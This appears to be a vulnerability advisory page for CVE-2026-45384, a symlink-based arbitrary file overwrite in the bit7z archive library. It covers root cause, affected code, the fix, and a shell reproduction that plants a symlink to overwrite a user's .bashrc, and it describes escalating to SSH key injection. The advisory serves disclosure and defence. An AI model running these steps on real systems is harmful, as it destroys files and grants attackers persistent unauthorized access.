VYPR
← All advisories
Medium severity6.1NVD Advisory· Published Jun 10, 2026

CVE-2026-45384

CVE-2026-45384

Description

bit7z library versions prior to 4.0.12 allow arbitrary file overwrite via symlink attack on predictable temporary files during archive updates.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

bit7z library versions prior to 4.0.12 allow arbitrary file overwrite via symlink attack on predictable temporary files during archive updates.

Vulnerability

Prior to version 4.0.12, the bit7z C++ static library contains an arbitrary file overwrite vulnerability. When updating an existing archive in-place using BitOutputArchive::compressToFile(), the library writes compressed data to a predictable temporary file named <archive_path>.tmp. This temporary file is opened using std::ofstream::open() with std::ios::trunc, which unconditionally follows symbolic links without any symlink check or O_NOFOLLOW protection. This affects Linux, macOS, and BSD platforms where symlinks are supported and the archive directory is writable by multiple users [1].

Exploitation

An attacker with write access to the directory containing the archive can exploit this vulnerability. The attacker first places a symbolic link at .tmp that points to an arbitrary target file. When a legitimate process subsequently updates the archive, the bit7z library follows the symlink and overwrites the target file with the archive data. This is not a race condition, as the symlink is placed before the update operation begins and persists throughout [1]. On Windows, creating symbolic links typically requires administrator privileges or Developer Mode, limiting exploitability on that platform [2].

Impact

Successful exploitation allows an attacker to overwrite arbitrary files on the system with the archive data. If the archive format is TAR (uncompressed), an attacker can embed an SSH public key into the archive. This key can be injected into the ~/.ssh/authorized_keys file, granting the attacker persistent unauthorized SSH access with the privileges of the user running the bit7z process [1].

Mitigation

This vulnerability has been fixed in bit7z version 4.0.12, released on or before June 10, 2026. Updating to version 4.0.12 or later is strongly recommended [2].

References
  1. Arbitrary File Overwrite via Symlink Attack on Predictable Temp File During Archive Update
  2. Release Bit7z v4.0.12 · rikyoz/bit7z

AI Insight generated on Jun 10, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Rikyoz/Bit7zreferences2 versions
    (expand)+ 1 more
    • (no CPE)
    • (no CPE)range: <4.0.12

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The library unconditionally follows symlinks when opening predictable temporary files for archive updates, allowing arbitrary file overwrites."

Attack vector

An attacker with write access to the archive directory can pre-place a symlink at the predictable temporary file path (`<archive_path>.tmp`). When a process subsequently updates the archive using `BitArchiveEditor::applyChanges()`, the library follows this symlink and overwrites the target file with archive data. This can lead to arbitrary file overwrite, and in the case of TAR archives, persistent unauthorized SSH access by injecting an SSH public key into `~/.ssh/authorized_keys` [ref_id=1].

Affected code

The vulnerability lies in `BitOutputArchive::compressToFile()` within `src/bitoutputarchive.cpp` which constructs a predictable temporary file path by appending `.tmp` to the archive name when updating. The `CFileOutStream` constructor in `src/internal/cfileoutstream.cpp` then opens this path using `std::ofstream::open()` with `std::ios::trunc`, which follows symlinks without any checks [ref_id=1].

What the fix does

The patch addresses the vulnerability by ensuring that temporary files are created securely. Instead of directly opening a predictable `.tmp` file, the library should use a mechanism like `mkstemp()` to atomically create a unique temporary file with appropriate permissions. This prevents an attacker from predicting the temporary file's name and placing a symlink to it before it is opened for writing [ref_id=1].

Preconditions

  • inputAttacker must have write access to the directory containing the archive.
  • configThe process performing the archive update must have write permissions to the target file.
  • configOn Linux, the attack is blocked in sticky-bit directories if `fs.protected_symlinks=1`; it succeeds in non-sticky shared directories or older kernels.

Reproduction

# Step 1: myuser creates a shared directory and initial archive mkdir -p /tmp/shared_backup && chmod 777 /tmp/shared_backup echo "backup data" > /tmp/data.txt ./helper create /tmp/shared_backup/data.7z /tmp/data.txt

# Step 2: testpoc_user (attacker) plants symlink at predictable .tmp path sudo -u testpoc_user ln -sf /home/myuser/.bashrc /tmp/shared_backup/data.7z.tmp

# Step 3: myuser's service updates the archive echo "new entry" > /tmp/extra.txt ./helper update /tmp/shared_backup/data.7z /tmp/extra.txt

# Step 4: Observe the damage od -A x -t x1z -N 16 /home/myuser/.bashrc # 000000 37 7a bc af 27 1c 00 04 ... >7z..'...<

Generated on Jun 10, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2

News mentions

0

No linked articles in our index yet.